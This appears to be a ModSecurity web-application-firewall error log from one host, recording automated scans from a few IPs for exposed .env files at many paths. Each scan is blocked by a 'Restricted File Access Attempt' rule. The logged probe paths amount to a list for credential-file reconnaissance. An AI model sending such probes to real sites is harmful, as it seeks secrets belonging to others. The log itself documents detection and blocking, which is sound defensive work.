[Tue Sep 09 14:23:18.012938 2025] [:error] [pid 2595967] [client 176.65.148.43:40986] [client 176.65.148.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMAcNuD76U5UaH27zCA-MQAAAA0"]
[Wed Sep 10 02:38:17.574896 2025] [:error] [pid 2612417] [client 23.180.120.244:48474] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMDIeeIimOpQeEQa94QKFgAAAAA"]
[Wed Sep 10 02:38:17.575869 2025] [:error] [pid 2612417] [client 23.180.120.244:48474] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMDIeeIimOpQeEQa94QKFgAAAAA"]
[Wed Sep 10 02:38:17.576082 2025] [:error] [pid 2612417] [client 23.180.120.244:48474] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMDIeeIimOpQeEQa94QKFgAAAAA"]
[Wed Sep 10 02:38:17.819114 2025] [:error] [pid 2612822] [client 23.180.120.244:48480] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aMDIeckxonAWE1K9awE8tgAAAAM"]
[Wed Sep 10 02:38:17.819349 2025] [:error] [pid 2612822] [client 23.180.120.244:48480] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aMDIeckxonAWE1K9awE8tgAAAAM"]
[Wed Sep 10 02:38:17.819538 2025] [:error] [pid 2612822] [client 23.180.120.244:48480] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aMDIeckxonAWE1K9awE8tgAAAAM"]
[Wed Sep 10 02:38:17.984867 2025] [:error] [pid 2612404] [client 23.180.120.244:48488] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aMDIebhuje86q-PXMfesLgAAAAk"]
[Wed Sep 10 02:38:17.985110 2025] [:error] [pid 2612404] [client 23.180.120.244:48488] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aMDIebhuje86q-PXMfesLgAAAAk"]
[Wed Sep 10 02:38:17.985281 2025] [:error] [pid 2612404] [client 23.180.120.244:48488] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aMDIebhuje86q-PXMfesLgAAAAk"]
[Wed Sep 10 02:38:18.173334 2025] [:error] [pid 2612405] [client 23.180.120.244:48500] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aMDIejlssyi5GS4antfAVwAAAAs"]
[Wed Sep 10 02:38:18.173576 2025] [:error] [pid 2612405] [client 23.180.120.244:48500] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aMDIejlssyi5GS4antfAVwAAAAs"]
[Wed Sep 10 02:38:18.173748 2025] [:error] [pid 2612405] [client 23.180.120.244:48500] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aMDIejlssyi5GS4antfAVwAAAAs"]
[Wed Sep 10 02:38:18.445224 2025] [:error] [pid 2612403] [client 23.180.120.244:48512] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aMDIeorDDo2kgJmLcsLGcwAAAAg"]
[Wed Sep 10 02:38:18.445463 2025] [:error] [pid 2612403] [client 23.180.120.244:48512] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aMDIeorDDo2kgJmLcsLGcwAAAAg"]
[Wed Sep 10 02:38:18.445634 2025] [:error] [pid 2612403] [client 23.180.120.244:48512] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aMDIeorDDo2kgJmLcsLGcwAAAAg"]
[Wed Sep 10 02:38:18.697181 2025] [:error] [pid 2612406] [client 23.180.120.244:48524] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aMDIemhDoHs1T_9Cow4O1QAAAAw"]
[Wed Sep 10 02:38:18.697420 2025] [:error] [pid 2612406] [client 23.180.120.244:48524] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aMDIemhDoHs1T_9Cow4O1QAAAAw"]
[Wed Sep 10 02:38:18.697592 2025] [:error] [pid 2612406] [client 23.180.120.244:48524] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aMDIemhDoHs1T_9Cow4O1QAAAAw"]
[Wed Sep 10 02:38:20.506900 2025] [:error] [pid 2612822] [client 23.180.120.244:57966] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aMDIfMkxonAWE1K9awE8twAAAAM"]
[Wed Sep 10 02:38:20.507137 2025] [:error] [pid 2612822] [client 23.180.120.244:57966] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aMDIfMkxonAWE1K9awE8twAAAAM"]
[Wed Sep 10 02:38:20.507299 2025] [:error] [pid 2612822] [client 23.180.120.244:57966] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aMDIfMkxonAWE1K9awE8twAAAAM"]
[Wed Sep 10 02:38:20.767885 2025] [:error] [pid 2612404] [client 23.180.120.244:57974] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aMDIfLhuje86q-PXMfesLwAAAAk"]
[Wed Sep 10 02:38:20.768118 2025] [:error] [pid 2612404] [client 23.180.120.244:57974] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aMDIfLhuje86q-PXMfesLwAAAAk"]
[Wed Sep 10 02:38:20.768273 2025] [:error] [pid 2612404] [client 23.180.120.244:57974] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aMDIfLhuje86q-PXMfesLwAAAAk"]
[Wed Sep 10 02:38:20.975999 2025] [:error] [pid 2612405] [client 23.180.120.244:57990] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aMDIfDlssyi5GS4antfAWAAAAAs"]
[Wed Sep 10 02:38:20.976327 2025] [:error] [pid 2612405] [client 23.180.120.244:57990] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aMDIfDlssyi5GS4antfAWAAAAAs"]
[Wed Sep 10 02:38:20.976502 2025] [:error] [pid 2612405] [client 23.180.120.244:57990] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aMDIfDlssyi5GS4antfAWAAAAAs"]
[Thu Sep 11 11:19:59.884492 2025] [:error] [pid 2641808] [client 195.178.110.161:40886] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMKUPzP-zgEHfk85WOuzUgAAAAI"]
[Thu Sep 11 11:19:59.885625 2025] [:error] [pid 2641808] [client 195.178.110.161:40886] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMKUPzP-zgEHfk85WOuzUgAAAAI"]
[Thu Sep 11 11:19:59.885793 2025] [:error] [pid 2641808] [client 195.178.110.161:40886] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMKUPzP-zgEHfk85WOuzUgAAAAI"]
[Thu Sep 11 11:20:15.195253 2025] [:error] [pid 2641810] [client 195.178.110.161:57888] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aMKUT5yTQF_NsWhvrdiQYQAAAAQ"]
[Thu Sep 11 11:20:15.195493 2025] [:error] [pid 2641810] [client 195.178.110.161:57888] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aMKUT5yTQF_NsWhvrdiQYQAAAAQ"]
[Thu Sep 11 11:20:15.195657 2025] [:error] [pid 2641810] [client 195.178.110.161:57888] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aMKUT5yTQF_NsWhvrdiQYQAAAAQ"]
[Thu Sep 11 11:20:15.464894 2025] [:error] [pid 2641899] [client 195.178.110.161:57890] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aMKUT6D2sArKbMCtkQQRKgAAAAY"]
[Thu Sep 11 11:20:15.465132 2025] [:error] [pid 2641899] [client 195.178.110.161:57890] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aMKUT6D2sArKbMCtkQQRKgAAAAY"]
[Thu Sep 11 11:20:15.465332 2025] [:error] [pid 2641899] [client 195.178.110.161:57890] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aMKUT6D2sArKbMCtkQQRKgAAAAY"]
[Thu Sep 11 11:20:15.709816 2025] [:error] [pid 2641807] [client 195.178.110.161:57894] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aMKUT8ocZ7Yf79rE2oe6IgAAAAE"]
[Thu Sep 11 11:20:15.710057 2025] [:error] [pid 2641807] [client 195.178.110.161:57894] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aMKUT8ocZ7Yf79rE2oe6IgAAAAE"]
[Thu Sep 11 11:20:15.710212 2025] [:error] [pid 2641807] [client 195.178.110.161:57894] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aMKUT8ocZ7Yf79rE2oe6IgAAAAE"]
[Thu Sep 11 11:20:15.958612 2025] [:error] [pid 2641806] [client 195.178.110.161:57900] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aMKUTxoLF0JPPSQEIDv1RwAAAAA"]
